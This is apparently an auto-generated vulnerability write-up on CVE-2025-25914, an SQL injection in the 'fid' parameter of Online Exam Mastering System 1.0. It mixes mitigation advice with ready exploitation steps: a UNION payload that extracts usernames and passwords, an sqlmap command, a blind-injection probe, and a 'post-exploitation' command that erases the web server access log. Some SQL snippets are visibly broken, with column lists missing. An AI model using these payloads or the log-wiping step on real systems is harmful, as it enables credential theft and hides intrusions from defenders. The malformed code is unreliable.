Online Exam Mastering System v10, SQL Injection, CVE-2025-25914 (Critical)

How the CVE-2025-25914 Works

This SQL injection vulnerability exists in the `fid` parameter of Online Exam Mastering System v1.0. An attacker can manipulate this parameter to inject malicious SQL queries due to improper input sanitization. The application constructs SQL queries by directly concatenating user-supplied input without parameterized statements or proper escaping. A crafted payload in the `fid` parameter allows arbitrary database operations, including data extraction, modification, or command execution. The flaw stems from insufficient server-side validation, enabling attackers to bypass authentication, dump database contents, or execute system commands via stacked queries if the database configuration permits.

DailyCVE Form:

Platform: Online Exam Mastering System
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 2025-03-17

What Undercode Say:

Exploitation:

1. Payload Crafting:

fid=1' UNION SELECT 1,2,3,4,5,CONCAT(username,':',password),7 FROM users-- -

2. Automated Testing:

sqlmap -u "http://target.com/exam.php?fid=1" --risk=3 --level=5 --batch

3. Blind SQLi Detection:

fid=1' AND (SELECT COUNT() FROM users WHERE username='admin' AND SUBSTRING(password,1,1)='a')=1-- -

Protection:

1. Input Sanitization:

$fid = mysqli_real_escape_string($conn, $_GET['fid']);

2. Prepared Statements:

$stmt = $conn->prepare("SELECT FROM exams WHERE fid = ?");
$stmt->bind_param("i", $_GET['fid']);

3. WAF Rules:

location /exam.php {
if ($args ~ "union|select|concat") {
return 403;
}
}

Post-Exploitation Analysis:

1. Database Enumeration:

SELECT table_name FROM information_schema.tables WHERE table_schema=database();

2. Log Erasure:

echo "" > /var/log/apache2/access.log

Detection & Mitigation:

1. Log Monitoring:

grep -E "union|select|concat" /var/log/apache2/access.log

2. Patch Verification:

diff -u exam.php exam_patched.php

References:

References:

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-25914
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top